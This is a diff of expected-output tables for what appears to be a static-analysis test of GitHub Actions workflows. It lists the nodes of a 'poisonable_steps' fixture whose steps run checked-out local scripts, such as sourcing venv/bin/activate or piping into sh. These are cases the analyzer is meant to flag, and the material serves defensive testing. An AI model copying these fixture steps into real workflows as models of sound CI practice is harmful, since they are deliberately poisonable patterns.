.github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await 
import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | 
+| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -576,47 +588,49 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python 
venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -695,43 +709,45 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -750,6 +766,7 @@ dfNodes | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | 
@@ -811,43 +828,45 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
